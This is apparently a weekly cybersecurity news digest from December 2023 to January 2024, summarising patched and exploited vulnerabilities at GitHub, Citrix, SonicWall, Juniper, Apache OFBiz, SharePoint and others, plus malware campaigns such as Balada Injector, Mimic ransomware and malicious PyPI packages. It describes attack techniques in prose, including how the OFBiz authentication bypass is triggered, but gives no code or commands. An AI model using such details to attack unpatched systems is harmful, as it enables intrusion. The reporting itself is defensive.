01/10/2024-01/17/2024 Citrix, VMware, and Atlassian Hit with Critical Flaws, SonicWall Firewalls Potentially Vulnerable, Critical RCE Vulnerability And More.

1. GitHub Rotates Keys After High-Severity Vulnerability Exposes Credentials

GitHub responded to a security vulnerability by rotating keys, including the GitHub commit signing key and customer encryption keys for GitHub Actions, Codespaces, and Dependabot. Discovered on December 26, 2023, the high-severity vulnerability (CVE-2024-0200, CVSS score: 7.2) was promptly addressed. While there’s no evidence of exploitation, GitHub urges users to import the new keys. GitHub Enterprise Server (GHES) is also affected, but exploiting it requires an authenticated user with an organization owner role logged into a GHES instance, limiting potential risks. Another high-severity bug (CVE-2024-0507, CVSS score: 6.5) was patched, allowing an attacker with Management Console user account access and editor role to escalate privileges through command injection. GitHub emphasizes user security following previous incidents, such as replacing the RSA SSH host key.

2. Citrix, VMware, and Atlassian Hit with Critical Flaws — Patch ASAP!

Citrix is warning of two zero-day security vulnerabilities in NetScaler ADC (formerly Citrix ADC)and NetScaler Gateway (formerly Citrix Gateway) that are being actively exploited in the wild. The flaws are listed below:

• CVE-2023-6548 (CVSS score: 5.5) – Authenticated (low privileged) remote code execution on Management Interface (requires access to NSIP, CLIP, or SNIP with management interface access)
• CVE-2023-6549 (CVSS score: 8.2) – Denial-of-service (requires that the appliance be configured as a Gateway or authorization and accounting, or AAA, virtual server).

Users of NetScaler ADC and NetScaler Gateway version 12.1 are recommended to upgrade their appliances to a supported version that patches the flaws. In recent months, multiple security vulnerabilities in Citrix appliances (CVE-2023-3519 and CVE-2023-4966) have been weaponized by threat actors to drop web shells and hijack existing authenticated sessions.

3. Alert: Over 178,000 SonicWall Firewalls Potentially Vulnerable to Exploits – Act Now

Over 178,000 exposed SonicWall firewalls face potential exploitation from two security flaws, leading to denial-of-service (DoS) conditions and remote code execution (RCE). Jon Williams, a senior security engineer at Bishop Fox, highlights the commonality in the vulnerabilities, manifested in different HTTP URI paths due to code pattern reuse. The flaws, namely CVE-2022-22274 (CVSS score: 9.4) and CVE-2023-0656 (CVSS score: 7.5), involve stack-based buffer overflows in SonicOS. These vulnerabilities allow remote, unauthenticated attackers to induce DoS or potentially execute code, posing significant risks. The cybersecurity firm warns of potential weaponization, causing repeated crashes and forcing the appliance into maintenance mode, necessitating administrative intervention to restore normal functionality.

4. Balada Injector Infects Over 7,100 WordPress Sites Using Plugin Vulnerability

Thousands of WordPress sites, using a vulnerable version of the Popup Builder plugin, face compromise by the Balada Injector malware. First identified by Doctor Web in January 2023, this ongoing campaign exploits security flaws in WordPress plugins to inject a backdoor, redirecting visitors to fraudulent tech support pages and scams. Sucuri’s recent findings reveal the extensive operation, active since 2017, infiltrating over 1 million sites. Balada Injector exploits a high-severity flaw in Popup Builder (CVE-2023-6000, CVSS score: 8.8), disclosed by WPScan and patched in version 4.2.3. The attackers aim to insert a malicious JavaScript file hosted on specialcraftbox[.]com, gaining control over sites and facilitating malicious redirects. Persistent control involves uploading backdoors and creating rogue administrators. In the latest wave, logged-in admin cookies trigger the installation of a rogue backdoor plugin, fetching a second-stage payload. This payload, saved as “sasas,” scans for site directories, modifying wp-blog-header.php to inject the Balada JavaScript malware.

5. Critical RCE Vulnerability Uncovered in Juniper SRX Firewalls and EX Switches

Juniper Networks has released updates to fix a critical remote code execution (RCE) vulnerability in its SRX Series firewalls and EX Series switches. The issue, tracked as CVE-2024-21591, is rated 9.8 on the CVSS scoring system. An out-of-bounds write vulnerability in J-Web of Juniper Networks Junos OS SRX Series and EX Series allows an unauthenticated, network-based attacker to cause a Denial-of-Service (DoS) or Remote Code Execution (RCE) and obtain root privileges on the device. The issue is caused by use of an insecure function allowing a bad actor to overwrite arbitrary memory. As temporary workarounds until the fixes are deployed, the company recommends that users disable J-Web or restrict access to only trusted hosts.  Additionally, Juniper Networks resolved a high-severity bug (CVE-2024-21611, CVSS score: 7.5) in Junos OS and Junos OS Evolved, potentially causing a DoS condition. Although there’s no evidence of exploitation, the company addresses these vulnerabilities following security issues with SRX firewalls and EX switches exploited by threat actors last year.

6. New PoC Exploit for Apache OfBiz Vulnerability Poses Risk to ERP Systems

Researchers have developed a proof-of-concept (PoC) exploiting a critical flaw (CVE-2023-51467, CVSS score: 9.8) in Apache OFBiz ERP system, allowing execution of a memory-resident payload. This vulnerability serves as a bypass for another severe flaw (CVE-2023-49070, CVSS score: 9.8) in the same software, enabling authentication circumvention and remote code execution. Though fixed in Apache OFBiz version 18.12.11, threat actors are attempting to exploit it in vulnerable instances. VulnCheck’s latest findings reveal that CVE-2023-51467 permits executing a payload directly from memory, leaving minimal traces. Apache OFBiz has a history of exploited vulnerabilities, with the recent bug joining the ranks. Despite security measures, the incomplete nature of the sandbox in the system allows potential attackers to run curl commands and obtain a bash reverse shell on Linux systems.

7. Act Now: CISA Flags Active Exploitation of Microsoft SharePoint Vulnerability

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical privilege escalation vulnerability (CVE-2023-29357, CVSS score: 9.8) in Microsoft SharePoint Server to its Known Exploited Vulnerabilities catalog due to ongoing attacks. The flaw allows attackers with access to spoofed JWT authentication tokens to execute a network attack, bypassing authentication and gaining administrator privileges without any user action. Microsoft patched the bug in June 2023, part of its Patch Tuesday updates. While real-world exploitation details and threat actor identities are unknown, federal agencies are urged to apply patches by January 31, 2024. Microsoft emphasizes protection for customers with automatic updates enabled.

01/04/2024-01/10/2024 4 Windows Update Patches 48 New Vulnerabilities, CISA Flags 6 Vulnerabilities, Hackers Target Microsoft SQL Servers And More.

1. Microsoft’s January 2024 Windows Update Patches 48 New Vulnerabilities

Microsoft rolled out Patch Tuesday updates for January 2024, fixing 48 security flaws across its software. Two critical and 46 important bugs were addressed, none publicly known or actively attacked. This marks the second consecutive Patch Tuesday with no zero-days. The fixes include nine for the Chromium-based Edge browser, patching a zero-day actively exploited (CVE-2023-7024). Among the critical patches this month: CVE-2024-20674, allowing bypass of Windows Kerberos security, and CVE-2024-20700, enabling remote code execution in Windows Hyper-V. Exploiting CVE-2024-20674 demands network access, while CVE-2024-20700 doesn’t require authentication but needs a race condition win for remote code execution. Notable flaws involve privilege escalation in CLFS (CVE-2024-20653) and a security bypass affecting SQL clients (CVE-2024-0056).

2. CISA Flags 6 Vulnerabilities – Apple, Apache, Adobe , D-Link, Joomla Under Attack

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added six actively exploited security flaws to its Known Exploited Vulnerabilities (KEV) catalog. Among them is CVE-2023-27524 (CVSS score: 8.9), a high-severity vulnerability in Apache Superset allowing remote code execution, fixed in version 2.1.
CISA also highlighted five other flaws:

• CVE-2023-38203 (CVSS score: 9.8) – Adobe ColdFusion Deserialization of Untrusted Data
• CVE-2023-29300 (CVSS score: 9.8) – Adobe ColdFusion Deserialization of Untrusted Data
• CVE-2023-41990 (CVSS score: 7.8) – Apple Multiple Products Code Execution
• CVE-2016-20017 (CVSS score: 9.8) – D-Link DSL-2750B Devices Command Injection
• CVE-2023-23752 (CVSS score: 5.3) – Joomla! Improper Access Control
  Notably, CVE-2023-41990, fixed by Apple in iOS 15.7.8 and iOS 16.3, was exploited in Operation Triangulation spyware attacks via a crafted iMessage PDF attachment. Federal Civilian Executive Branch agencies are urged to apply fixes by January 29, 2024, to counter active threats.

3. Alert: New Vulnerabilities Discovered in QNAP and Kyocera Device Manager

Kyocera’s Device Manager product is susceptible to a disclosed security flaw (CVE-2023-50916) allowing attackers to coerce authentication attempts to malicious resources, potentially leading to data theft and NTLM relay attacks. The vulnerability arises from a path traversal issue, now resolved in Kyocera Device Manager version 3.1.1213.0.
In a related development, QNAP addressed multiple high-severity vulnerabilities:

• CVE-2023-39296: Prototype pollution flaw in QTS and QuTS hero.
• CVE-2023-47559: XSS vulnerability in QuMagie.
• CVE-2023-47560: OS command injection flaw in QuMagie.
• CVE-2023-41287: SQL injection vulnerability in Video Station.
• CVE-2023-41288: OS command injection flaw in Video Station.
• CVE-2022-43634: Unauthenticated remote code execution flaw in Netatalk.

While no evidence of exploitation exists, users are urged to update to the latest versions of affected products to mitigate potential risks.

4. Alert: Ivanti Releases Patch for Critical Vulnerability in Endpoint Manager Solution

Ivanti addressed critical vulnerabilities in its Endpoint Manager (EPM) and Avalanche solutions. CVE-2023-39336 impacts EPM versions 2021 and 2022 (pre-SU5), posing a risk of remote code execution through SQL injection, with a severity score of 9.6.
In a separate update, Ivanti resolved 21 flaws in Avalanche, 13 of which were critical buffer overflows (CVSS scores: 9.8), patched in Avalanche 6.4.2. These could lead to denial-of-service or code execution if exploited by attackers sending specially crafted data packets to the Mobile Device Server.
While no evidence exists of exploitation, it’s worth noting that state-backed actors previously exploited zero-day flaws (CVE-2023-35078 and CVE-2023-35081) in Ivanti’s Endpoint Manager Mobile (EPMM) to breach Norwegian government networks. Users should apply the provided updates to mitigate potential risks.

5. Hackers Target Microsoft SQL Servers In Mimic Ransomware Attacks

A financially motivated Turkish hacking group, known as RE#TURGENCE, is targeting Microsoft SQL (MSSQL) servers worldwide with Mimic (N3ww4v3) ransomware. The campaign, affecting targets in the EU, U.S., and Latin America, typically ends with either selling compromised host access or deploying ransomware. The attackers exploit insecurely configured MSSQL servers, utilizing xp_cmdshell for command shell access. They employ heavily obfuscated Cobalt Strike payloads, launch AnyDesk for remote desktop access, and collect credentials using Mimikatz. The Mimic ransomware, dropped via AnyDesk, encrypts files and displays a ransom note. The group’s tactics link them to Phobos ransomware attacks. Securonix previously exposed a similar campaign (DB#JAMMER) targeting MSSQL servers with Mimic ransomware in the past year. Users are advised to secure MSSQL configurations to mitigate risks.

12/27/2023-01/04/2024 3 Malicious PyPI Packages, Privilege Escalation Flaw Impacting Kubernetes Service, Critical Zero-Day in Apache OfBiz ERP System And More.

1. Beware: 3 Malicious PyPI Packages Found Targeting Linux with Crypto Miners

Three new malicious packages have been discovered in the Python Package Index (PyPI) open-source repository with capabilities to deploy a cryptocurrency miner on affected Linux devices. The three harmful packages, named modularseven, driftme, and catme, attracted a total of 431 downloads over the past month before they were taken down. These packages, upon initial use, deploy a CoinMiner executable on Linux devices. The malicious code resides in the __init__.py file, which decodes and retrieves the first stage from a remote server, a shell script (“unmi.sh”) that fetches a configuration file for the mining activity as well as the CoinMiner file hosted on GitLab. The ELF binary file is then executed in the background using the nohup command, thus ensuring that the process continues to run after exiting the session. Echoing the approach of the earlier ‘culturestreak’ package, these packages conceal their payload, effectively reducing the detectability of their malicious code by hosting it on a remote URL.

2. Google Cloud Resolves Privilege Escalation Flaw Impacting Kubernetes Service

Google Cloud has addressed a medium-severity security flaw in its platform that could be abused by an attacker who already has access to a Kubernetes cluster to escalate their privileges. An attacker who has compromised the Fluent Bit logging container could combine that access with high privileges required by Anthos Service Mesh (on clusters that have enabled it) to escalate privileges in the cluster. Palo Alto Networks Unit 42, which discovered and reported the shortcoming, said adversaries could weaponize it to carry out “data theft, deploy malicious pods, and disrupt the cluster’s operations.” A key prerequisite to successfully exploiting the vulnerability hinges on an attacker having already compromised a FluentBit container by some other initial access methods, such as via a remote code execution flaw. A threat actor could use this access to gain privileged access to a Kubernetes cluster that has ASM enabled and then subsequently use ASM’s service account token to escalate their privileges by creating a new pod with cluster-admin privileges. By way of fixes, Google has removed Fluent Bit’s access to the service account tokens and re-architected the functionality of ASM to remove excessive role-based access control (RBAC) permissions.

3. Critical Zero-Day in Apache OfBiz ERP System Exposes Businesses to Attack

A new zero-day security flaw has been discovered in Apache OfBiz, an open-source Enterprise Resource Planning (ERP) system that could be exploited to bypass authentication protections. The vulnerability, tracked as CVE-2023-51467, resides in the login functionality and is the result of an incomplete patch for another critical vulnerability (CVE-2023-49070, CVSS score: 9.8) that was released earlier this month. CVE-2023-51467 could be triggered using empty and invalid USERNAME and PASSWORD parameters in an HTTP request to return an authentication success message, effectively circumventing the protection and enabling a threat actor to access otherwise unauthorized internal resources. The attack hinges on the fact that the parameter “requirePasswordChange” is set to “Y” (i.e., yes) in the URL, causing the authentication to be trivially bypassed regardless of the values passed in the username and password fields. It is imperative that users move quickly to secure their Apache OFBiz instances against the two vulnerabilities.

4. CISA warns of actively exploited bugs in Chrome and Excel parsing library

The first issue that CISA added to its Known Exploited Vulnerabilities (KEV) is CVE-2023-7101, a remote code execution vulnerability that affects versions 0.65 and older of the Spreadsheet::ParseExcel library. Spreadsheet::ParseExcel contains a remote code execution vulnerability due to passing unvalidated input from a file into a string-type “eval.” Specifically, the issue stems from the evaluation of Number format strings within the Excel parsing logic. One product using the open-source library is Barracuda ESG (Email Security Gateway), which has been targeted in late December by Chinese hackers who exploited the CVE-2023-7101 in Spreadsheet::ParseExcel to compromise appliances. The latest actively exploited vulnerability added to KEV is CVE-2023-7024, a heap buffer overflow issue in WebRTC in Google Chrome web browser. Google Chromium WebRTC contains a heap buffer overflow vulnerability that allows an attacker to cause crashes or code execution. This vulnerability could impact web browsers using WebRTC, including but not limited to Google Chrome. The flaw was discovered by Google’s Threat Analysis Group (TAG) and received a fix via an emergency update on December 20, in versions 120.0.6099.129/130 for Windows and 120.0.6099.129 for Mac and Linux.

5. ‘everything’ blocks devs from removing their own npm packages

Over the holidays, the npm package registry was flooded with more than 3,000 packages, including one called “everything,” and others named a variation of the word. Installing everything could have just caused your computer to potentially fall short of storage space and slow down, but the package’s mere existence on npmjs.com prevents authors—unrelated to this package whatsoever, from unpublishing their packages from the world’s largest JavaScript software registry. The “everything” package has just 5 sub-packages, published under the “@everything-registry” scope, listed as its dependencies.  These 5 packages, however, gradually manage to pull in every single package present on the entire registry as a dependency. For example, “everything” pulls in “@everything-registry/chunk-2,” which may further attempt to pull in several other packages by the same author, such as “@everything-registry/sub-chunk-1623.” Each of these sub-packages (or “chunks” as the author calls them), ultimately includes about 800 npm projects as their dependency.  The problem is, since ‘everything’ relies on every package (including yours), your package gets stuck, and there’s some unknown package preventing you from removing it.